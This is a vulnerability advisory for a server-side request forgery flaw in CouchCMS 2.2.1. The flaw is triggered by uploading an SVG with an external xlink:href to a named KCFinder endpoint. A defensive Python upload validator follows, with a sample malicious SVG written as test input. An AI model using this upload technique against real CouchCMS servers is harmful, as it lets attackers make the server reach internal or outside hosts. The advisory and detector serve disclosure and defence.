Vendor: CouchCMS
By: xxcdd
CVSS: 8.8 (HIGH)
CWE: CWE-918, Server-Side Request Forgery (SSRF)
Product Name: CouchCMS
Affected Version From: 2.2.1
Affected Version To: 2.2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:couchcms:couchcms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2021
CouchCMS 2.2.1 – SSRF via SVG file upload
An issue was discovered in CouchCMS v2.2.1 that allows SSRF via an SVG upload to /couch/includes/kcfinder/browse.php. The upload URL is /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en, and the SVG content contains an xlink:href attribute pointing to a malicious IP address.
Mitigation:
Upgrade to the latest version of CouchCMS.
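
A defensive upload check for the issue described above, as an added example that is not CouchCMS or KCFinder code: it parses an uploaded SVG and reports every href, src, or CSS url() reference that points outside the document. The function name, the sample files and the 192.0.2.10 address are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Anything with a URI scheme (http:, file:, data:, ...) or a scheme-relative
# "//host" form is treated as leaving the document. "#id" fragments are local.
EXTERNAL = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
CSS_URL = re.compile(r"url\(\s*['\"]?\s*([^'\")\s]+)", re.I)


def external_refs(svg_bytes):
    """Return (element, attribute, target) for each external reference."""
    upper = svg_bytes.upper()
    if b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
        # Refuse DTDs outright: entity definitions can hide references.
        raise ValueError("SVG with DOCTYPE/ENTITY declarations rejected")

    hits = []
    for el in ET.fromstring(svg_bytes).iter():
        tag = el.tag.rsplit("}", 1)[-1]           # drop the XML namespace
        for name, value in el.attrib.items():
            attr = name.rsplit("}", 1)[-1]        # xlink:href and href -> "href"
            if attr in ("href", "src") and EXTERNAL.match(value):
                hits.append((tag, attr, value))
            # url(...) inside style="" or presentation attributes such as fill
            for target in CSS_URL.findall(value):
                if EXTERNAL.match(target):
                    hits.append((tag, attr, target))
        if tag == "style" and el.text:            # inline <style> sheets
            for target in CSS_URL.findall(el.text):
                if EXTERNAL.match(target):
                    hits.append((tag, "text", target))
    return hits


# Constructed sample inputs (192.0.2.10 is a documentation-only address).
SAMPLE_BAD = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="http://192.0.2.10/probe" width="1" height="1"/>
  <rect style="fill:url(#grad)" width="1" height="1"/>
  <use xlink:href="#shape"/>
</svg>"""
SAMPLE_OK = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="1" fill="url(#g)"/></svg>'

if __name__ == "__main__":
    for label, data in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        refs = external_refs(data)
        print(label, "REJECT" if refs else "accept", refs)
```

An upload handler would reject the file when the returned list is non-empty; same-document fragments such as `#shape` pass.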